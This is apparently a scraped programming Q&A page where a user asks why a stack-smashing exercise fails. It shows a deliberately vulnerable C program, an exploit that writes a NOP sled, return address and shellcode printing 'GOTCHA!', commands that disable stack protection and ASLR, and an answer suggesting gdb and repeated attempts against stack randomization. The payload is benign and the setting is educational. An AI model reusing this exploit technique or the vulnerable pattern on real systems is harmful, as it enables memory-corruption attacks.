CODEWITHSUNDEEP
csecuritybufferbuffer-overflow
atrueresistance
atrueresistance

Reputation: 1368

C overflows need some direction

I have 2 programs that I'm trying to do some stack smashing with.

vuln.c

#include <stdlib.h>
#include <stdio.h>
int bof()
{
    char buffer[8];
    FILE *badfile;
    badfile = fopen( "badfile", "r" );
    fread( buffer, sizeof( char ), 1024, badfile );
    return 1;
}

int main( int argc, char **argv)
{
    bof();
    printf("Not gonna do it! \n");
    return 1;
}

exploit.c

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

char shellcode[] =
 "\xeb\x16"
 "\x31\xdb"
 "\x31\xd2"
 "\x31\xc0"
 "\x59"
 "\xbb\x01\x00\x00\x00"
 "\xb2\x09"
 "\xb0\x04"
 "\xcd\x80"
 "\xb0\x01"
 "\xcd\x80"
 "xe8\xe5\xff\xff\xff"
 "GOTCHA!\n";

#define OFFSET 1500

    int bof()
    {
       char buffer[8];
       strcpy(buffer, "AAAAAAAAA");
       return 1;
    }

    unsigned long get_ESP(void)
    {
          __asm__("movl %ESP,%EAX");
    }

    int main(int argc, char **argv)
    {
      unsigned int addr;
      FILE *badfile;
      char buffer[1024];
      addr = get_ESP()+OFFSET;
      fprintf(stderr, "Using Offset: 0x%x\nShell code size: %lx\n",addr, sizeof(shellcode));
      memset(&buffer, 0x90, 1024);
      buffer[12] = addr & 0x000000ff;
      buffer[13] = (addr & 0x0000ff00) >> 8;
      buffer[14] = (addr & 0x00ff0000) >> 16;
      buffer[15] = (addr & 0xff000000) >> 24;
      memcpy( &buffer[ (sizeof(buffer) - sizeof(shellcode)) ], shellcode,sizeof(shellcode) );
      badfile = fopen("./badfile","w");
      fwrite(buffer,1024,1,badfile);
      fclose(badfile);

    }

I compiled this on my Macbook with these commands, gcc vuln.c -fno-stack-protector -o vuln and gcc exploit.c -fno-stack-protector -o exploit. I then run vuln, and it runs fine, then exploit and get this output:

Using Offset: 0x6acd6814
Shell code size: 28

I then corrupt the file with od -t x2 badfile, so it ends up looking like this: 

bash-3.2# cat badfile
????????????h?j?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????1?1?1?Y??   ?̀?̀xe8????GOTCHA!

I'm trying to get the exploit the vuln program so it prints GOTCHA! I am right now getting Bus error: 10. Could anyone give me a hint on where I'm going wrong?

_________________________update________

I tried this same procedure with BT5. using echo 0 > /proc/sys/kernel/randomize_va_space to disable ASLR.

I still can't figure out why this doesn't work. I get this when running in gdb: 

Program received signal SIGSEGV, Segmentation fault.
0x90909090 in ?? ()
(gdb)

Am I attempting this correctly?

Upvotes: 1

Views: 434

Answers (1)

Michael
Michael

Reputation: 2281

I'm not sure what kind of protection OSX has - it's possible this will work better on a Linux box.

Anyway, the basic idea looks alright - your vulnerable program opens a large file and dumps it into a tiny array. The problem appears to be your file creation.

When you get ESP, you're getting the stack pointer of the current program. That has no bearing on the vulnerable program unless the stack is setup exactly the same in both (which it's not).

What might work better is actually executing the vulnerable program in gdb until you hit bof() and looking at the stack pointer then. If that's consistent, then you win. If it's randomized (which my guess is that it is), then you're going to need to use your nop-sled and hope.

On a 32-bit machine, the stack randomization isn't too much that repeatedly attempting the exploit should eventually get you a successful attack.

Good luck!

Upvotes: 1

Related Questions